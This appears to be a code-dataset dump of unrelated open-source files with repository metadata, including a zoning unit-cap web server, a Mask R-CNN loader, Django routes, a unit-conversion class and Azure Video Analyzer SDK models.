acc_20gp+=rule_list[i].iloc[z]['20GP'] acc_40gp+=rule_list[i].iloc[z]['40GP'] acc_40hq+=rule_list[i].iloc[z]['40HQ'] if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价': if flag[z]==0: flag[z]=1 acc_20gp-=rule_list[i].iloc[z]['20GP'] acc_40gp-=rule_list[i].iloc[z]['40GP'] acc_40hq-=rule_list[i].iloc[z]['40HQ'] print(flag) print(acc_20gp) print(acc_40gp) print(acc_40hq) if newlist[k].iloc[j]['CNTR_TYPE']=='20GP': newlist[k].iloc[j,15]+=acc_20gp if newlist[k].iloc[j]['CNTR_TYPE']=='40GP': newlist[k].iloc[j,15]+=acc_40gp if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ': newlist[k].iloc[j,15]+=acc_40hq for i in newlist: print('revenue:'+str(i['AMT'].sum())) print('newrevenue:'+str(i['new_AMT'].sum())) newlist[0].to_csv('voyage1.csv') newlist[1].to_csv('voyage2.csv') newlist[2].to_csv('voyage3.csv')
27.118644
121
0.62375
0
0
0
0
0
0
0
0
702
0.213764
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940
776
py
Python
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
1
2020-08-26T12:20:26.000Z
2020-08-26T12:20:26.000Z
import pytest import numpy as np from fanok.selection import adaptive_significance_threshold @pytest.mark.parametrize( "w, q, offset, expected", [ ([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ( [-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93, ), ], ) def test_adaptive_significance_threshold(w, q, offset, expected): w = np.array(w) threshold = adaptive_significance_threshold(w, q, offset=offset) assert threshold == expected
27.714286
79
0.474227
0
0
0
0
678
0.873711
0
0
24
0.030928
4c49699fa44232922a69a87e2fa00808e22b315a
7,256
py
Python
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
1
2021-10-03T14:44:38.000Z
2021-10-03T14:44:38.000Z
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
null
null
null
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
1
2021-02-20T23:22:10.000Z
2021-02-20T23:22:10.000Z
#!/usr/bin/python # Copyright 2019 Christopher Schmidt # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer from urlparse import urlparse, parse_qs from jinja2 import Template import sqlite3 import urllib def get_caps(options): far = {} for i in ['A-1', 'A-2', 'B', 'SD-2']: far[i] = 0.5 for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']: far[i] = 0.6 for i in ['C-1', 'BA-3', 'IB-2', 'O-1']: far[i] = .75 for i in ['BA-1', 'SD-12']: far[i] = 1.0 for i in ['C-1A', 'SD-5']: far[i] = 1.25 for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']: far[i] = 1.5 for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']: far[i] = 1.75 for i in ['BC', 'O-2']: far[i] = 2.0 for i in ['C-2A']: far[i] = 2.50 for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']: far[i] = 3.0 for i in ['IA-2', 'IB']: far[i] = 4.0 far['BB-1'] = 3.25 far['SD-11'] = 1.7 far['SD-15'] = 3.5 lot_area = { 'A-1': 6000, 'A-2': 4500, 'C-1A': 1000, 'BC': 500, 'BC-1': 450, 'IA-1': 700, 'SD-8': 650, 'SD-14': 800, } for i in ['IB-2', 'BA-1']: lot_area[i] = 1200 for i in ['B', 'SD-2', 'SD-3']: lot_area[i] = 2500 for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']: lot_area[i] = 1800 for i in ['C-1', 'BA-3']: lot_area[i] = 1500 for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']: lot_area[i] = 600 for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']: lot_area[i] = 300 for i in lot_area: if options and 'lot_explicit' in options: lot_area[i] = options['lot_explicit'] elif options and 'lot_factor' in options: lot_area[i] = int(lot_area[i] / float(options['lot_factor'])) if 'no_lot' in options: lot_area = {} for i in far: if options and 'far_explicit' in options: far[i] = options['far_explicit'] elif options and 'far_factor' in options: far[i] = far[i] * float(options['far_factor']) if 'no_far' in options: far = {} return far, lot_area def table(options): far, lot_area = get_caps(options) table = [] for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']: table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,""))) return "\n".join(table) def unit_cap(row, options=None): if not options: options = {} far, lot_area = get_caps(options) zone = row['zone'] if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD": return -1 if zone in ['A-1', 'A-2'] and not 'no_a' in options: return 1 #print row area = float(row.get('gis_lot_size',0) or 0) if zone in lot_area and area: m = max(area/(lot_area[zone]), 1) else: m = 100000 max_building = area * far[zone] * 1 if max(int(max_building/800), 1) < m: m = max(int(max_building/800), 1) if zone == "B" and not 'no_b' in options: m = min(m, 2) return m def dict_factory(cursor, row): d = {} for idx, col in enumerate(cursor.description): d[col[0]] = row[idx] return d def compute_count(options = None): conn = sqlite3.connect("prop.db") if options == None: options = {} c = conn.cursor() c.row_factory = dict_factory m = 0 current = 0 for row in c.execute("SELECT * FROM lots"): t = unit_cap(row, options=options) if t == -1: continue m += int(t) return m def describe(options): changes = [] if 'no_lot' in options: changes.append("eliminate lot size/unit minimums") elif 'lot_explicit' in options: changes.append("set all lot size/unit minimums to %s" % options['lot_explicit']) elif 'lot_factor' in options and options['lot_factor'] != 1.0: changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor']) if 'no_a' in options: changes.append('eliminate single family zoning in A-1 and A-2 zones') if 'no_b' in options: changes.append('eliminate two-family zoning limits in B zones') if 'far_explicit' in options: changes.append("set all FAR maximums to %s" % options['far_explicit']) elif 'far_factor' in options and options['far_factor'] != 1.0: changes.append('increase FAR maximums by a factor of %s' % options['far_factor']) if len(changes): return ", ".join(changes) else: return "" def serve(options): d = open("unit_template.html") template = Template( d.read() ) unit_count = int(compute_count(options)) data = {} data['changes'] = describe(options) data['unit_count'] = unit_count data['increase'] = unit_count-37453 data['table'] = table(options) data['options'] = options s = template.render(**data) return s PORT_NUMBER = 8080 class myHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() # Send the html message form = parse_qs(urlparse(self.path).query) options = {} for i in ['far_factor', 'lot_factor']: if i in form: options[i] = float(form[i][0]) else: options[i] = 1.0 if 'far_explicit' in form and form['far_explicit']: options['far_explicit'] = float(form['far_explicit'][0]) if 'lot_explicit' in form and form['lot_explicit']: options['lot_explicit'] = int(form['lot_explicit'][0]) if 'lot' in form: options['no_lot'] = True if 'singlefamily' in form: options['no_a'] = True if 'twofamily' in form: options['no_b'] = True self.wfile.write(serve(options)) return def run(): try: #Create a web server and define the handler to manage the #incoming request server = HTTPServer(('', PORT_NUMBER), myHandler) print 'Started httpserver on port ' , PORT_NUMBER #Wait forever for incoming htto requests server.serve_forever() except KeyboardInterrupt: print '^C received, shutting down the web server' server.socket.close() if __name__ == "__main__": print run()
32.106195
108
0.553335
961
0.132442
0
0
0
0
0
0
2,354
0.324421
4c4972e50ba94dc3591b0fc9fac43e37a601a455
25
py
Python
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
2
2022-02-11T04:39:21.000Z
2022-02-12T15:50:35.000Z
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
null
null
null
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
null
null
null
from .main import Matrix
12.5
24
0.8
0
0
0
0
0
0
0
0
0
0
4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e
2,348
py
Python
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
import os import sys import json import datetime import numpy as np import glob import skimage from PIL import Image as pil_image import cv2 import cv2 def locationToMask(locations=None,height=None,width=None): mask = np.zeros([height, width, len(locations)], dtype=np.uint8) for index,location in enumerate(locations): x1, y1, x2, y2 = location mask[y1:y2+1,x1:x2+1,index]=1 print(mask[:,:,index]) return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32) def load_cmk(dataset_dir, subset): folder=os.path.join(dataset_dir, subset) imagesPattern=folder+'/*.jpg' for image_path in glob.glob(imagesPattern): print(image_path) img = cv2.imread(image_path) height,width = img.shape[:2] imageId=os.path.basename(image_path).replace('.jpg','') print(imageId) # # self.add_image( # "balloon", # image_id=a['filename'], # use file name as a unique image id # path=image_path, # width=width, height=height, # polygons=polygons) locationsFile='%s/%s.txt' % (folder,imageId) locations=[] with open(locationsFile) as fp: lines = fp.readlines() for line in lines: line = line.replace('\n', '') if len(line.split(' ')) < 5: break classIndex, xcen, ycen, w, h = line.strip().split(' ') xmin = max(float(xcen) - float(w) / 2, 0) xmax = min(float(xcen) + float(w) / 2, 1) ymin = max(float(ycen) - float(h) / 2, 0) ymax = min(float(ycen) + float(h) / 2, 1) xmin = int(width * xmin) xmax = int(width * xmax) ymin = int(height * ymin) ymax = int(height * ymax) location=(xmin,ymin,xmax,ymax) locations.append(location) print(locations) dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/' subset='val' load_cmk(dataset_dir=dataset_dir,subset=subset) locations=[(2,3,5,7),(8,8,9,9)] height=10 width=10 # mask,classIds=locationToMask(locations=locations,height=height,width=width) # print(mask) # print(classIds)
18.488189
77
0.559199
0
0
0
0
0
0
0
0
382
0.162692
4c49c1d6c63daaf7fca0ba56abe4608634b5eea3
371
py
Python
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
myBeautifulSoup.py
ZhongXinWang/python
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- #Author:Winston.Wang import requests from bs4 import BeautifulSoup print(dir(BeautifulSoup)) url = 'http://www.baidu.com'; with requests.get(url) as r: r.encoding='utf-8' soup = BeautifulSoup(r.text) #格式化 pret = soup.prettify(); u = soup.select('#u1 a') for i in u: print("名称:%s,地址:%s" % (i.getText(),i.get('href')))
24.733333
52
0.660377
0
0
0
0
0
0
0
0
140
0.361757
4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c
869
py
Python
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
1
2020-10-14T17:13:45.000Z
2020-10-14T17:13:45.000Z
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
null
null
null
blogsNewsModule/urls.py
adityakekare/NewsAPIDjango
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
[ "MIT" ]
null
null
null
from django.urls import path, include from . import views urlpatterns = [ path("", views.newsView, name="home"), path("createBlog", views.CreateBlogView.as_view(), name="createBlog"), path("myBlogs", views.PostListView.as_view(), name="myBlogs"), path("single/<int:pk>", views.PostDetailView.as_view(), name="single"), path("subscribe", views.subscribeView,name="subscribe"), path("about", views.aboutView, name="about"), path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"), path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"), path("like/<int:pk>", views.LikeView, name="like_post"), # API urls for superuser path("api/create/", views.APICreateView.as_view()), path("api/posts/", views.APIListView.as_view()), path("api/posts/<int:pk>", views.APIDetailView.as_view()), ]
41.380952
75
0.667434
0
0
0
0
0
0
0
0
252
0.289988
4c4ab4331dee2d296afdfa6d9310db62fe1c4c93
3,133
py
Python
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
unitClass.py
MatthewZheng/UnitsPlease
5911267b5a0a78dd4d833c6be46e89caaf98c200
[ "MIT" ]
null
null
null
#!/usr/bin/python _author_ = "Matthew Zheng" _purpose_ = "Sets up the unit class" class Unit: '''This is a class of lists''' def __init__(self): self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"] self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"] def baseCheck(self, userList): '''Converts elements in str list to base units''' converted = [] for i in (userList): isSquared = False unitPreIndex = "" #checks if it has a carat in the expression for ind, j in enumerate(list(i)): if j == "^": isSquared = True unitPreIndex = ''.join(list(i)[:ind]) break #converts non-unary unit to base unit and checks for squared variables while(i not in (self.baseUnits or self.derivedUnits) and len(list(i)) != 1 and unitPreIndex not in (self.baseUnits or self.derivedUnits) and len(unitPreIndex) != 1): orgNameList = list(i) #identify prefix removed self.idPrefix = orgNameList.pop(0) i = ''.join(orgNameList) print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i)) #checks if it is a special unit if(i not in (self.baseUnits and self.derivedUnits)): #append in case for special units break else: #append in case for base unit break #Appends base unit if(i in (self.baseUnits or self.derivedUnits) and isSquared == False): converted.append(i) elif(isSquared == True): toAppend = [] numReps = [] #run once to get number of times the unit is squared for index, val in enumerate(list(i)): if val == "^": numStart = index+1 numReps.append(''.join(list(i)[numStart:])) toAppend.append(''.join(list(i)[:index])) break #convert numReps into an int intReps = int(''.join(numReps)) #append number of units specified by the carat for l in range (intReps): if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)): print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend)) converted.append(''.join(toAppend)) #Exception for special units else: print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i) converted.append(i) return(converted)
42.917808
192
0.509416
3,050
0.973197
0
0
0
0
0
0
1,033
0.329611
4c4be3eb705a80e6147920908a86da5673e90f59
918
py
Python
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
1
2021-02-27T18:35:39.000Z
2021-02-27T18:35:39.000Z
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Feb 26 22:23:07 2020 @author: Neal LONG Try to construct URL with string.format """ base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}" stock = "000002" api_type = 'cp' print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) stock = "00002" print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) print('='*40) print('{:>6}'.format('236')) print('{:>06}'.format('236')) print("Every {} should know the use of {}-{} programming and {}" .format("programmer", "Open", "Source", "Operating Systems")) print("Every {3} should know the use of {2}-{1} programming and {0}" .format("programmer", "Open", "Source", "Operating Systems"))
27
80
0.623094
0
0
0
0
0
0
0
0
571
0.622004
4c4da9a43e106d41a3befb2cd7c5b3dab87492dd
274
py
Python
conans/server/server_launcher.py
Wonders11/conan
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
[ "MIT" ]
6,205
2015-12-01T13:40:05.000Z
2022-03-31T07:30:25.000Z
conans/server/server_launcher.py
Wonders11/conan
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
[ "MIT" ]
8,747
2015-12-01T16:28:48.000Z
2022-03-31T23:34:53.000Z
conans/server/server_launcher.py
Mattlk13/conan
005fc53485557b0a570bb71670f2ca9c66082165
[ "MIT" ]
961
2015-12-01T16:56:43.000Z
2022-03-31T13:50:52.000Z
from conans.server.launcher import ServerLauncher from conans.util.env_reader import get_env launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME")) app = launcher.server.root_app def main(*args): launcher.launch() if __name__ == "__main__": main()
18.266667
66
0.762774
0
0
0
0
0
0
0
0
29
0.105839
4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09
153,586
py
Python
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
praveenkuttappan/azure-sdk-for-python
4b79413667b7539750a6c7dde15737013a3d4bd5
[ "MIT" ]
2,728
2015-01-09T10:19:32.000Z
2022-03-31T14:50:33.000Z
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
v-xuto/azure-sdk-for-python
9c6296d22094c5ede410bc83749e8df8694ccacc
[ "MIT" ]
17,773
2015-01-05T15:57:17.000Z
2022-03-31T23:50:25.000Z
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
v-xuto/azure-sdk-for-python
9c6296d22094c5ede410bc83749e8df8694ccacc
[ "MIT" ]
1,916
2015-01-19T05:05:41.000Z
2022-03-31T19:36:44.000Z
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from azure.core.exceptions import HttpResponseError import msrest.serialization class Resource(msrest.serialization.Model): """Common fields that are returned in the response for all Azure Resource Manager resources. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__( self, **kwargs ): super(Resource, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.system_data = None class ProxyResource(Resource): """The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__( self, **kwargs ): super(ProxyResource, self).__init__(**kwargs) class AccessPolicyEntity(ProxyResource): """Access policies help define the authentication rules, and control access to specific video resources. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param role: Defines the access level granted by this policy. Possible values include: "Reader". :type role: str or ~video_analyzer.models.AccessPolicyRole :param authentication: Authentication method to be used when validating client API access. :type authentication: ~video_analyzer.models.AuthenticationBase """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'role': {'key': 'properties.role', 'type': 'str'}, 'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'}, } def __init__( self, **kwargs ): super(AccessPolicyEntity, self).__init__(**kwargs) self.role = kwargs.get('role', None) self.authentication = kwargs.get('authentication', None) class AccessPolicyEntityCollection(msrest.serialization.Model): """A collection of AccessPolicyEntity items. :param value: A collection of AccessPolicyEntity items. :type value: list[~video_analyzer.models.AccessPolicyEntity] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[AccessPolicyEntity]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(AccessPolicyEntityCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class AccountEncryption(msrest.serialization.Model): """Defines how the Video Analyzer account is (optionally) encrypted. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param type: Required. The type of key used to encrypt the Account Key. Possible values include: "SystemKey", "CustomerKey". :type type: str or ~video_analyzer.models.AccountEncryptionKeyType :param key_vault_properties: The properties of the key used to encrypt the account. :type key_vault_properties: ~video_analyzer.models.KeyVaultProperties :param identity: The Key Vault identity. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the Key Vault mapping. :vartype status: str """ _validation = { 'type': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(AccountEncryption, self).__init__(**kwargs) self.type = kwargs['type'] self.key_vault_properties = kwargs.get('key_vault_properties', None) self.identity = kwargs.get('identity', None) self.status = None class AudioEncoderBase(msrest.serialization.Model): """Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed. You probably want to use the sub-classes and not this class directly. Known sub-classes are: AudioEncoderAac. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded (2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160, 192, 224, and 256. If omitted, the bitrate of the input audio is used. :type bitrate_kbps: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'} } def __init__( self, **kwargs ): super(AudioEncoderBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.bitrate_kbps = kwargs.get('bitrate_kbps', None) class AudioEncoderAac(AudioEncoderBase): """A custom preset for encoding audio with the AAC codec. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded (2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160, 192, 224, and 256. If omitted, the bitrate of the input audio is used. :type bitrate_kbps: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, } def __init__( self, **kwargs ): super(AudioEncoderAac, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str class AuthenticationBase(msrest.serialization.Model): """Base class for access policies authentication methods. You probably want to use the sub-classes and not this class directly. Known sub-classes are: JwtAuthentication. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'} } def __init__( self, **kwargs ): super(AuthenticationBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class CertificateSource(msrest.serialization.Model): """Base class for certificate sources. You probably want to use the sub-classes and not this class directly. Known sub-classes are: PemCertificateList. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'} } def __init__( self, **kwargs ): super(CertificateSource, self).__init__(**kwargs) self.type = None # type: Optional[str] class CheckNameAvailabilityRequest(msrest.serialization.Model): """The check availability request body. :param name: The name of the resource for which availability needs to be checked. :type name: str :param type: The resource type. :type type: str """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, **kwargs ): super(CheckNameAvailabilityRequest, self).__init__(**kwargs) self.name = kwargs.get('name', None) self.type = kwargs.get('type', None) class CheckNameAvailabilityResponse(msrest.serialization.Model): """The check availability result. :param name_available: Indicates if the resource name is available. :type name_available: bool :param reason: The reason why the given name is not available. Possible values include: "Invalid", "AlreadyExists". :type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason :param message: Detailed reason why the given name is available. :type message: str """ _attribute_map = { 'name_available': {'key': 'nameAvailable', 'type': 'bool'}, 'reason': {'key': 'reason', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, } def __init__( self, **kwargs ): super(CheckNameAvailabilityResponse, self).__init__(**kwargs) self.name_available = kwargs.get('name_available', None) self.reason = kwargs.get('reason', None) self.message = kwargs.get('message', None) class CredentialsBase(msrest.serialization.Model): """Base class for credential objects. You probably want to use the sub-classes and not this class directly. Known sub-classes are: UsernamePasswordCredentials. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'} } def __init__( self, **kwargs ): super(CredentialsBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class TokenKey(msrest.serialization.Model): """Key properties for JWT token validation. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EccTokenKey, RsaTokenKey. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param kid: Required. JWT token key id. Validation keys are looked up based on the key id present on the JWT token header. :type kid: str """ _validation = { 'type': {'required': True}, 'kid': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'kid': {'key': 'kid', 'type': 